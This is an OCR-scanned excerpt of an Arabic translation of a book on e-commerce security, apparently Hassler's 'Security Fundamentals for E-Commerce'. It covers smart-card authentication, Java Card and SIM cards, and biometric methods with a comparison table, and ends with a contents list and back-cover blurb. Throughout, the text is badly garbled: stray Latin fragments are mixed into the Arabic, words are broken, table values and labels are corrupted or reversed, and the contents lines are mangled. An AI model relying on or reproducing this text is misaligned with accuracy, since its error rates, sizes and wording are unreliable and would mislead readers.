بروتوکولات توثيق طرف البطاقة هى بروتوکولات (ستجابة / تحدی ویمکن أن تسس 
على وظائف مزيج مشفرة أو على قناة اتصالات آمنة متائلة أو غير Whar‏ . بالاضافة 
لذلك » فمن الضروری ats Ls ON [slo‏ إتضالات امنة بين البطاقة والطرفی e‏ خاصة 
للربط من بعد . 

ولازالت مشكلة آمن لم تحل بعد هو طرفیات تطبیق غير موثوق بها . فمثلاً » فان 
حافظ بطاقة قد يستعمل هذه البطاقة الذكية للتسوق المركزى فى البيت . البطاقة تتصل 
مع PC‏ (الحاسب الشخصى الخاص e‏ والموثوق به Bole‏ . وإذا كان حافظ البطاقة 
يحمل أدنى برامج من الانترنيت » فلا يمكنه أن يعرف إذا ما كان هناك حصان طروادة 
على PC‏ والذى قد استبدل تطبيق بطاقة الطرفى الأصلى . وعندما يتم تطبيق بطاقة 
الطرفى الأصلى . وعندما يتم سؤال حافظ البطاقة » مثلاً » أن يوقع بطاقة شراء فان 
حصان طروادة قد يعرض الإصدار الصحيح للدور ولكن يرسل إصدار خاطىء 
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للبطاقة الذكية التى ستوقع . وامجوم الشابه يمكن عمله بمقاطعة (وتعديل) 
الاتصالات بين تطبيق GI)‏ والبطاقة . وأفضل حل هو وجود أداة مقاومة للعبث 
وشخصية متضمنة وسادة PIN‏ وقارىء البطاقة والعرض Gilly‏ يمكن أن يبين 
لحافظ البطاقة المحتوى الحقيقى ليتم توقيعه (ما تراه هو ما توقعه) . حالياً لا توجد تلك 
الأذوات فى الأسواق . 

البطاقات الذكية بوظيفية عامة تحمى الجزء الخاص لزوج المفتاح العام (أى خارج 
البطاقة) ثم تحمل على البطاقة . والاتجاه الأفضل هو توليد زوج المفتاح مباشرة على 
بطاقة أثناء طور جعل البطاقة شخصية بحيث Y‏ يترك المفتاح الخاص البطاقة وبذلك 
لا تتعرض هجوم بتاتا . 

وبجانب المفاتيح العامة » فان البطاقة الذكية قد تحتاج مفاتيح متاثلة أيضاً . 
ويمكن استعالما » للتوثيق Ss‏ أو كمفاتيح دورات (Session)‏ . وتستخرج مفاتيح 
التوثيق sale‏ من مفتاح أساسى (خصص لكل جيل مفاتيح البطاقات الذكية وبعض 
معلومات البطاقة / المخصصة) (مثل رقم البطاقة) . الدورات أو الفاتیح الديناميكية 
قد تستعمل أرقام عشوائية إضافة لذلك أو قيم تعتمد على الزمن . 
بطاقة Java‏ : 

بطاقة Java‏ ( الاصدار الحالى2.1 ) عبارة عن بطاقة ذكية بالة فعلية بطاقة 
Java : JCVM Card Virtual Machine) Java‏ والتی یمکن آن ترجم برامج Java‏ 
مستقلة عن نظام التشغيل تسمى تطبيقات (Card applets) ¿Us‏ أو (cardlets)‏ 
تكتب بطريقة مشامة لتطبيقات Java‏ معتادة. ولكن بسبب الذاكرة المحدودة وقدرة 
الحساب لبطاقة ذكية » فإن مجموعة ففرعية فقط لخواص لغة هى التى تدعم (مثل » 
خيوط» واستثناءات أو مجموعة نفایات) والاحتیاج الأدنى ES‏ بطاقة Java‏ 
ROMJ¿24K sa‏ و161 ل (cardlets J) EEPROM‏ .512 بایت ل RAM‏ . 
وبخلاف الآلة الفعلية ل4۷[ » فان ICVM‏ تعمل على دورة ساعة As Y‏ 
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تكنولوجيا الذاكرة المتواصلة (مثل ۰ (EEPROM‏ تساعد البطاقة الذكية باختزان 
معلومات حتى بعد نزع التغذية . 101/81 يتم تنفیذها . 10۷۸1 تنفذ البطاقة على PC‏ 
أو محطة عمل وتؤدى كل العمل المطلوب لتحميل الفصول وحل المراجع . الجزء التالى 
على البطاقة JCVM (on - card)‏ يتضمن مترجم شفرة بايت (byte code)‏ . وهذا 
ce‏ أن المعالحة التمهيدية الاضافية مطلوبة قبل تحميل التطبيق (applet)‏ على 
البطاقة. تحميل نتيجة معالحة خارج البطاقة (off - card)‏ على البطاقة يجب ale‏ 
شفريا . [els‏ البطاقة » Hy ob‏ زمن تشغيل بطاقة (JCRE Java Card : Java‏ 
Runtime Environme)‏ تتضمن JCVM‏ على بطاقة الأنواع على إطار بطاقة (حزمة 
إطار بطاقة Java‏ ) . الحزم الأخرى خيارية مثل Javacardx. framework‏ مع نظام 
ملف توجیه / شىء بناء على 4 - 7816 IEC‏ / 150 أو Javacardx. crypto‏ بوظائف 
تشفير . الحزم التى تدعم الحافظة الالكترونية المتوسطة فى القطاع «(EN1546)‏ 
وبطاقة (GSM 11.11) ¿SIM‏ تصنع واحدة من الميزات الأساسية لبطاقة Java‏ آنها 
يمكن أن تستضيف تطبيقات متعددة Cardlets)‏ متعددة يمكن أن تقيم على بطاقة 
واحدة). والخاصية ترفع قوة الأمن » لأنه يجب ألا يكون مکنا ل Cardlets‏ الوصول 
لبيانات كل منها . لذلك e‏ فان بطاقة Java‏ ها الية تسمى «Cardlet Firewall) ¿le‏ 
والذى يعنى أن 15 لا يمكنها الوصول لبيانات بعضها البعض BIN‏ سمحت 
لما صراحة خلال المشترك المشارك فيه Gig‏ حافظ بطاقة مؤسس ع PIN‏ مدعم 
أيضا . 
بطاقة SIM‏ : 

وحدة تحديد مشترك GSM‏ والتى تختزن بيانات المشترك الشخصية يمكن تنفيذها فى 
شكل بطاقة ذكية )11.11:11.14 (GSM‏ . ويوجد As‏ بطاقات 81¥ مؤسسة 
| على 2.0 Java Card‏ مثل Cardlets. Cyberflex Simera‏ يمكن نقلها للبطاقة 
بواسطة e SMS‏ إما من مزود محتوی أو عند طرفى U Simera . "point - of - sale"‏ 
ii‏ ۵ عملية وحمايات بين Cardlets‏ . 


yet 


والتطور الاخر ذو الاهتام فى البطاقة الذكية ومجال التجارة الالكترونية هو Visa‏ 
Open Platform‏ « والمدعم بواسطة مؤسسات مالية متعددة» ومزودى الخدمة e‏ 
وعوامل الشبكة المحمولة ومصنعى الاجزاء الصلبة . وهدفها هو عمل حلول عيارية 
لتجارية الكترونية امنة وشريحة platform‏ مفتوحة والتى تسمح للمؤسسات ASW‏ أن 
تحمل أدنى (ديناميكياً) تطبیقات دفع Visa‏ لتلیفون محمول على آساس تکنولوجیا بطاقة 
8 . بطاقات SIM‏ الجيل التال التی ستستعمل فى 1۷5 ناستسمی]11 (وحدة 
تحديد الستخدم ı (User identity module:‏ أو USIM‏ (وحدة مدید المشترك 
الشاملة) . وعل „Se‏ بطاقات SIM‏ » فان بطاقات UIM‏ ستکون قادرة على أداء 
توثيق یدوی مع الشبكة» غالبا باستعمال آلية منحنی بیضاوی . 


الأعمار الافتراضية : 


© توكين (token)‏ (أى شىء يمتلكه شخص) (مثل بطاقة ذكية أو جواز سفر) . 
6 آو خواص شخصية (أى شىء للشخص أو يولده Sole‏ (مثل بصمه إصبع أو 
توقيع) : 
النوع الثالت لالية التوثيق هو موضوع العمر الافتراضى (biometrics)‏ . والتطبيق 
الذى یستعمل طرق عمر افتراضی له (ستعالات شرعية (forensic)‏ [مثل تحقيق مع 
«Le?‏ أو استع‌الات مدنية (مثل جواز سفر) » أو استعمالات أمن (مثل تحكم وصول ) 
واستعمالات تجارية (تطبيقات التجارة المحمولة والالكترونية) . وكثير من الشركات مثل 
American Express «IBM «Master Card‏ تدرس استعال تكنولوجيا العمر 
الافتراضی ف التجارة الالكترونية والأمن . والمعلومات عن المعايير الناتجة يمكن 
اجادها. 


تحديد العمر الافتراضى يمكن تعريفه بأنه تحديد شخصى على آساس خواصه 
وتصرفاته المميزة والفسيولوجية . ومن الضرورى أنه موضوع التعرف على نموذج وفى طور 
التسجيل (enrollment phase)‏ » فان خواص العمر الافتراضی لشخص يتم مسحها 
bles‏ واختزائها فى شكل رقمى مثل (Template) IE‏ . ویمکن إختزان SW‏ 
فى قاعدة بيانات مركزية أو على بطاقة ذكية . وفى طور التعرف «(recognition phase)‏ 
فإن خاصية العمر الافتراضى يتم مسحها ومعالحتها مرة آخری» ثم تقارن مع القالب 
(template)‏ . وفى طور التعرف » فان الذى سيتم التعرف عليه لا يتطلب تحديد محدد 
. النظام يبحث قاعدة بيانات القالب كلها لايجاد توافق» والذى من الواضح قد isi‏ 
زمن طويل . وطور التحقق عادة آسرع OV Les‏ الشخص يحتاج تحديد معين (مثل e‏ 
باستعمال بطاقة ذكية) بحيث يمكن للنظام أن يجد فى الحال القالب الصحيح ويقارنه 
مع البيانات الممسوحة حديثا . 


كلمات السر PINS‏ أو يمكن نسيانها بسهولة . ويمكن إخبارها لأشخاص آخرين» 
أو حتى يتم معرفتها بطريقة احتياها . وف الحالة الأخيرة » فليس من الممكن التفرقة 
بين شخص موكل أو مزيف . البطاقات الذكية أو جوازات السفر يمكن فقدها أو 
سرقتها . طرق التقدير الافتراضية تقدم وسائل أبسط للتوثيق ۰ خاصة بالجمع مع 
البطاقة الذكية » مع أنها ليست بالضرورة أسرع أو أكثر Lud‏ . واحدة من المشاكل 
الأساسية مع التقدير الافتراضی هو أن نتائج السح قد تتغير لحد كبير أو أقل (أى 
تتشتت) ۰ وبذلك تختلف عن النموذج المرجع . إمكانية أن النظام يقبل Jee‏ 
(impostor)‏ يشار إليه بمعدل التوافق اطا LUIS, « (False match rate: FMR)‏ 
يسمى معدل القبول الخطأء واحتمال رفضه لشخص مؤهل (موكل) يعرف بمعدل عدم 
التوافق الخطأ EMIS; «(False non match rate ) FNR‏ يسمى معدل الرفض 
الخطأ. تطبيق الأمن dbl‏ يحتاج ل Y ¡o FMR‏ يحدث تلف أقل إذا تم رفض 
لشخص موكل le‏ يحدث إذا قبل شخص غير موكل FMR: FNR.‏ یمکن أن يتأثر 
بضبط قيم الحد لتشتيتات نتيجة المسح المسموح به . 


VÍA 


وتوجد بعض المعايير الهامة والتى يجب تلبيتها بواسطة أى طريقة إحصاء مؤسسة 
عل خواص MANE‏ 

© الشمول (universality)‏ « والذى يعنى أن كل شخص يجب أن يمتلك 
اطا 

© التفرد (uniqueness)‏ » والذى يعنى أنه لا sey‏ ان و ا من 
الاشخاص قد يكون هما نفس الخواص . 

©الدوام e (permane nce)‏ والذی یعنی أن الخواص لا تتغیر LES‏ عبر الزمن : 

© عدم الزيف (unfakeability)‏ . والذى يعنى أن الخاصية لايمكن تقديمها 
بطريقة إحتيالية . 

© القبول (acceptability)‏ « والذى يعنى أن معظم الناس ليس لدم إعتراض 
لاستعمال الطريقة (أى OLY‏ إجتاعية أو صحية) . 

© التجمع (Collectability)‏ » والذى يعنى أن الخاصية يجب أن تكون ALB‏ 

2 er ¿Lal يكون‎ ole والذى يعنى أن النظام‎ « (performance) AÑO 
وقابلاً للتحمل ولا يحتاج أكثر من كمية معقولة من الموارد (أى إحتياج اختزان‎ 
. للنموذج)‎ 

ويجب توخی الحرص عندما تنقل بیانات إحصائية عبر وصلات غير آمنة (أى 
جراحة!). ومعاير 8104۴1 الخارجية ستعطی مشترك لشبکات cil‏ وکذلك 
Calabrese pits‏ یقترح باستعمال بروتوکولات استجابة / تحدی Gog llo‏ بطريقة 
ما بحیث of‏ البیانات الاحصائية لا تسل ياتا عبر الشبكة» وبذلك فهی معرضة 
للهجوم . وبدلاً من ذلك» ۰ فإن التوثيق يرسل تحدی عشوائى وأداة إحصائية (مثل 
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بطاقة ذكية) تستجيب بمزيج آمن للبيانات الاحصائية ومسلسلة بتحدى. واتجاه 
استعال خواص جسم لتشفير بيانات يسمى تشفير إحصائى biometric encryp-)‏ 
Calabreseos  كلذک . (tion‏ یقرح استع‌ال (حصاءات بدلا من PIN‏ لتوئیق 
حامل وثيقة للبطاقة الذكية . فى الجحزئين التاليين سنعطی لمحة عن طرق احصائية 
مؤسسة على خواص فسيولوجية وخواص التصرفات . وهذا ملخص فى جدول (۱۰ - 
.)١‏ ويمكن sel‏ معلومات إضافية عن الإحصائيات » مثل صفحة (homepage)‏ 
LEY‏ صناعة الاحصاء الدولى « أو ln . U.S. Biometric Consortium‏ ‘ 
بسبب FMRs‏ العالية نسبياً واحتياجات الحزمة العريضة (مثل32 » كيلو بايت ثنائى فى 
الثانية) للمسح والتحقق واجراءات التوثيق » فان النظم الإحصائية ليست منتشرة 
الاستعمال e WE‏ وقد قدر أنه سيستغرق عاماً أو عامين لعمل نظم إحصائية والتی 
سيتم قبوطا بعدد كبير من المستخدمين . أخيراً » حيث أن البيانات الاحصائية تمثل 
معلومات شخصية جدا » فيجب la‏ بحرص شديد حتى لا تنتهك اللخصوصية . 
الخواص الفسيولوجية : 

التعرف على الوجهء هو واحد من المجالات الفعالة للبحث الاحصائی . فهو 
مؤسس عادة على شكل موقع» وعلاقات مكانية للعيون» والحواجب» والأنف 
والشفاة وخواص وجهية أخرى . والطريقة ليست متلامسة كلية » ولكنها تحتاج غالبا 
Lal‏ بسيطة أو إضاءة خاصة وتعتمد على المنظر بقوة . بالاضافة لذلك » يمكن أن 
يتغير الوجه كثيراً عبر الزمن » فمثلاًء خلال قص الشعر الحديث أو الإعداد أو 
النظارة . النموذج500 بايت على الأقل . ۴۸۸عالى جداً وی حدود 10%. 

الشكل الوجهى عبارة عن نموذج ناتج من النظام الدورى التحتى فى الوجه 
البشرى» وتشع من الجلد عندما تمر الحرارة خلال النسيج الوجهى . وله ميزتان على 
التعرف على الوجه . ولا يتغير حتى بعد جراحه بلاستيكية » ولا يحتاج لاضاءة خاص . 
وم يتم برهنة أن الاشكال الحرارية الوجهية مميزة بدرجة كافية . 


۱:۸ 





جدول (۱.۱۰) 


)۱( Biometric Methods 





۱ (۳ 
| (x) Template FNR FMR 
| Uniqueness Permanence Acceptability size (byte) (%) (%) 
‘Physiological characteristics MIR 
)۱( | Face = + ++ 500 10 j 
CY) | recognition 
N | Facial y4 ++ + NA NA NA 
CE) | thermogram 
(0) | Fingerprint ++ ++ - 309-800 0.01 107% 
(0) | Hand + + + 10-30 0,8 08 
(mM | geometry 
(A) | Retina! ++ + - 40-80 0.005 10° 
(9) | pattern 
١١ Kris ++ + + 256-1000 NA 107" 
۱۱ 'Behavioral characteristics 
۱۲ “Keystroke + + + NA NA NA 
۱۳ ¡dynamics 
١5 | Speech + - ++ 100-100 1 1 
10 | recognition 
YY | Dynamic + - ++ 40-1000 1 0,5 
1¥ y signature ae 
+ + high, + medium, — low, FNR False Nonmatch Rate, FMR False Match Rate NA Not Available 
\A 19 ۳۰ ۳۱ oa ۳۳ 
حجم النموذج‎ (T) التعدد‎ alga طرق إحصائية (۲) قبول‎ (1) 
اليد‎ )١( الشکل اخراری (۵) بصمة الاصبع‎ )(  یهجو‎ )۲(  فرعتلا‎ )۲(  هجولا‎ (1) 
خواص التصرف‎ )۱( ةقدحلا)٠١(‎ galt) شبکی (للعين)‎ (A) هندسة‎ (Y) 
lv N) تعرف‎ (10) ul) مشوار المفتاح (۳) دینامیکیات‎ (ir) 
معدل عدم توافق خطا )11( معدل توافق خطا‎ (TI) عالى )19( متوسط (۲۰) منخفض‎ (1A) 
غير متاح‎ (TT) 


1£4 























وعملياً e‏ فان العيب السىء فقط لبصمة الاصبع أا غير مقبولة جيداً لاسباب 
اجتراعية (فهى تقليدياً مصاحبة للتحقيقات الاجرامية) . FMR‏ صغبرة جداً )106%( ۰ 
وكذلك فان FNR‏ مقبولة Lad‏ )% ?10( . وحجم النموذج (template)‏ قد يتغير 
بین300 800۰ Cub‏ » وهو كبير نسبياً GL‏ بطرق آخری . وحتى نمنع التوافقات 
الخاطئة للأصابع والتى تم قطعها من جسم » وكلا الخاطئة للأصابع والتى تم قطعها 
من جسم » كلا درجة الحرارة النبضة والجسم يتم قياسها أيضا . 

هندسة اليد (hand geometry)‏ تعضمن قياس IES‏ اليد البشرية » وآطوال 
وأعراض الأصابع 1 وأحياناً نموذج البريد (Vein pattern)‏ . وکان یستعمل منذ عشرة 
أعوام . حجم النموذج منخفض جدا فى حدود 10 إلى 30 بايت » ولكن7011 e‏ 
و1111 قد يكون حتی 1% . كذلك » فإن التحقق قد يستغرق حتی عشرة ثوانى . 

النموذج الشبكى (retinal pattern)‏ هو التنظيم المحدد للأوردة تحت سطح 
الشبكية لعين. النموذج صغير ( 40 إلى 80 بايت)15711» وخاصة FMR‏ منخفضة 
نسبياً . والطريقة ليست مقبولة جیداً من بعض الناس ۰ وبدون الخوف من الأمراض 
المعدية أو تلف العين خلال الأشعة تحت الحمراء . . كذلك » فإن العدسات اللاصقة 
قد تسیب مشاكل لأا ليست شفافة كلية للأشعة تحت الحمراء . مسح الحدقة iris)‏ 
(Scanning‏ يقبل أفضل CY‏ السافة لمعدة القياس أكبر » ولكن المعدة أغلى ¿des‏ 
الثمن . وللدهشة e‏ فإن أفضل النتائج يتم الوصول ها بكاميرا آسود / أبيض . حدقة 
العين البشرية يمكنها تحديد أى شخص بدقة مثل DNA‏ الخاص به . 

خواص التصرف : 

خواص التصرف Mea SÍ (behavioral characteritics)‏ فى أن يتغير عبر 
الزمن عن All‏ لفسیولوجية » لذلك فهى تحتاج طرق متبناه يمكنها تعديل نموذج 
الرجع بناء على ذلك . حالیا » توجد BU‏ طرق تقدیر فى هذا الوضوع : ديناميكية 
مشوار الفتاح (أى إيقاع الکتابة) » واحدیث (أى التعرف على الصوت . والتوقيع . 


\0: 


طرق ديناميكية مشوار الفتاح مؤسسة على قياس الفترات بين المشاوير (strokes)‏ 
والشخص الذى سيتم توثيقه مطلوب أن يكتب بين 100 150۰ حرف هجائى عددى ؛ 
باستعیال كل الأصابع العشرة » وهو أكبر عيب هذه الطريقة . حالياً فان Bio Pass-‏ 
word's patent‏ (ترخيص حياة كلمة السر) . التعرف على الصوت يمكن تأسيسه على 
foro‏ حدیث یعتمد gl‏ لا Je dan‏ نص . والطرق التی تعتمد Je‏ نص لیست deol‏ 
بدرجة كافية LY‏ مؤسسة على كمال جلة ثابتة محددة مسبقثاً » والتی یمکن عرضها 
Lal‏ من شريط صوت . والطرق المستقلة عن النص ¿SÍ‏ تعقيداً جداً FNR: FMR.‏ 
فى حدود 1% والذى يجعل الطريقة مناسبة لتطبيقات الأمن فقط . حجم النموذج 
(templte)‏ قد يصل حتی>11 . أخيرا » طرق التوقيع (signature)‏ قد تكون ستاتيكية 
أو ديناميكية . الطرق الاستاتيكية تستعمل هندسة التوقيع فقط » ولكن من الصعب 
جداً التفرقة بين التوقيع الحقيقى والتوقيع المنسوخ . والطرق الديناميكية تستعمل 
الهندسة » ولكن آیضا سرعة وعجلة وضغط ولحات جانبية للمسار للتوقيع . والطريقة 
معروفة جيداً ومقبولة جيداً » ولكن ۴١۸ e FMR‏ عالية نسبياً [حتى 1% ] . وأحجام 
ac‏ حتى AK‏ 





الباب الأول : Vene‏ 


مقدمة عن الأمن Deere‏ 
تبديدات الأمن ee sie‏ 
- اهجوم على نظام A Re eee E te‏ 
إدارة المخاطرة NW ee ee ata aR‏ 
خدمات الأمن ee‏ د A‏ 
- الیات الأمن ASSAD E‏ 
الاب الثانی : نظم الدفع الالکترونی ی تفه لبم Valid‏ 
د العجازة الالكتروقة Mardi e e,‏ 
نظم الدفع الالكترونى Vi Jelena tiered ae‏ 
- اللامركزى مع المركزى ÓN‏ 
-الدین أمام الدائن امت قا stat‏ حو اراد اك الاك EY RR‏ 
أجهزة الدفع موده u‏ ا وا Nes (ps‏ 
بطاقات OSV‏ لا VE ee‏ 
- النقود الالکترونية e‏ 
الشيك الالكترونى tits‏ م م م O‏ ما هم tip‏ 
الحافظة الالكترونية ال ا ور وري AA‏ 


الياب الرابيع : إطار الدفع الالكترونى RERET‏ 
- بروتوكول التجارة الفتوح فى الانترنيت --- 
مواضع الأمن الي م عه 


كشف الاقتحام الاحصائى معي 


- تطبيقات الانترنيت التى يدعمها الأمن 
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- إصدارات أمن ذاكرة HTTP‏ المؤقتة eee ae‏ 0 0 100 
- توثيق موكل e HTTP‏ موه وج VV se Ea‏ 
جالترین الا ساشین a OO‏ 
- التوثیق المختصر ÓN ٠‏ 
- استخدام الأنبوب ee SSL‏ وم یت 
آمن تعامل Web‏ ااا عا عادو At nennen un‏ 
ON S - HTTP.‏ 
الباب السابع : أمن خادم الشبكة N teen‏ 
أمن E web‏ 8 -- ۸۹ 
- مشترك مر عام E i eo CGI‏ 
Web Pr‏ مجهول الاسم E EE Ree A‏ 
آمن قاعدة البيانات on‏ فيك 
— حماية حقوق النسخ ۷ 
الباب الثامن : مفاهيم التجارة الالكترنية مؤسسة على الشبكة ne‏ 0 ۱۱۱ 
- مفاهيم مؤسسة على OF ease ae eevee, XML‏ 
رفع سعر الدفع الدقيق ا RO E E O E‏ 
- تمهيدى الدفع الالكترونى المشترك TEPI‏ 0 
الباب التاسع : أمن المحمول ERD E E‏ 
- آمن تجارة المحمول Me in EE‏ 
- عرض تکنولوچی و ره زا و یی که 1۱۱۱ 
- أمن rey RAR GSM‏ بب NN‏ 
_ حصوصية هوية المشترك LIY e‏ 


- خصوصية البيانات والربط encarnan‏ ب ا ود لله عد مد نج 
- أمن طبقة النقل oe een ASA‏ 


O ا‎ en Ve وو‎ ae ee k eat ibe بيئة تنفيذ تطبيق‎ 


N -‏ الافتراضية 


- الخواص الفسيولوجية وكا ا رن دو RER A E‏ 


Security Fundamentals 
For E - Commerce 


by : Vensa Hassler 


N (0 و‎ a SA spas 
a الك‎ ay Ag! Sala ا‎ "Sa 


IN‏ لأضيل الله العامة 







النجارةالإلكترونيه 
وتامينها 


أصبحت التجارة الإلكترونية تعبيراً مألوفا فى وسائل الاعلام 








لمرثية والمسموعة . f‏ 

كذلك صار WS‏ من رجال SLAW‏ والشركات تتعامل بہذہ TE‏ 
الوسيلة.الحديثة لسهولتها » ولتوفير الوقت والمجهود . ويمكن br‏ 
إستعمال التليفون المحمول للتعامل ELE‏ بهذه الوسيلة . tal‏ > 


وقد ساعد إنتشار الحاسب الآلى وشبكات الإنترنت والانترانيت 
على ترويج هذه الوسيلة التى تتناما بسرعة كبيرة . 

وقد أدى هذا العمل حماية للأموال والتعاملات التجارية ضد 

الأعمال الغير مشروعة . ش 
| وهذا الكتاب يعتبر مدخل متواضع هذا الوضوع حتی نحمى 
| القارىء العربى من سرقات التجارة الإلكترونية ومشاكلها . 


